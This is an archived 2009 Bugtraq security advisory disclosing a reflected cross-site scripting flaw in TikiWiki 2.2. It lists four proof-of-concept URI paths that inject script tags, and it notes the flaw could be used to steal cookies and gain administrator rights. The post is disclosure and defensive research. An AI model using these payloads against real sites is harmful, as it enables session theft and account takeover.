lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <200903120854.n2C8sfs8027843@www3.securityfocus.com> Date: Thu, 12 Mar 2009 02:54:41 -0600 From: iliz-z@...dex.rui To: bugtraq@...urityfocus.com Subject: TikiWiki 2.2 XSS Vulnerability in URI Application: TikiWiki Version: 2.2 (latest) Website: www.tikiwiki.org Bug: Active XSS in URI Exploitation: Remote Date: 12 Mar 2009 Discovered by: iliz Author: iliz Contact: e-mail: iliz-z(at)yandex(dot)ru Bug Description: TikiWiki version 2.2 and later uses URI in html response body and fails to sanitize it. Is therefore prune to Active XSS attack. PROOF OF CONCEPT: /tiki-galleries.php/>"><Script>alert(1)</scRipt> /tiki-list_file_gallery.php/>"><Script>alert(2)</scRipt> /tiki-listpages.php/>"><Script>alert(3)</scRipt> /tiki-orphan_pages.php/>"><Script>alert(4)</scRipt> The javascript code will be executed in the context of the victim's browser, this can be exploited to steal cookies and escalate privileges to administrator. Tested with TikiWiki 2.2, Apache 2.2, Mozilla Firefox 3.0.6, InternetExplorer 7, Opera 9.65
Powered by blists - more mailing lists